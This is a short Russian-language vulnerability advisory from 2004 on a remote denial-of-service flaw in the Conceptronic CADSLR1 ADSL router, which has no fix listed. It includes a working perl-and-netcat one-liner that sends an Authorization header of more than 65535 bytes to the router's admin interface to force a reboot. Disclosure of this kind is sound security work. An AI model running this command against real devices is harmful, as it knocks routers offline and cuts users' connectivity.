Удаленный DoS против Conceptronic ADSL маршрутизатора

Дата публикации:22.07.2004
Всего просмотров:1126
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Conceptronic ADSL Router Model CADSLR1; 3.04n

Описание: Уязвимость в Conceptronic ADSL маршрутизаторах позволяет удаленному пользователю перезагрузить устройство.

Удаленный пользователь может послать HTTP Basic Authentication строку длиннее 65535 байт к административному Web интерфейсу, чтобы перезагрузить целевой маршрутизатор.

Пример/Эксплоит:

$ $victima="ip.victim"
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization: Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80

URL производителя:http://www.conceptronic.net/product3.asp?g=5&p=*CADSLR1

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Denial of Service in Conceptronic CADSLR1 Router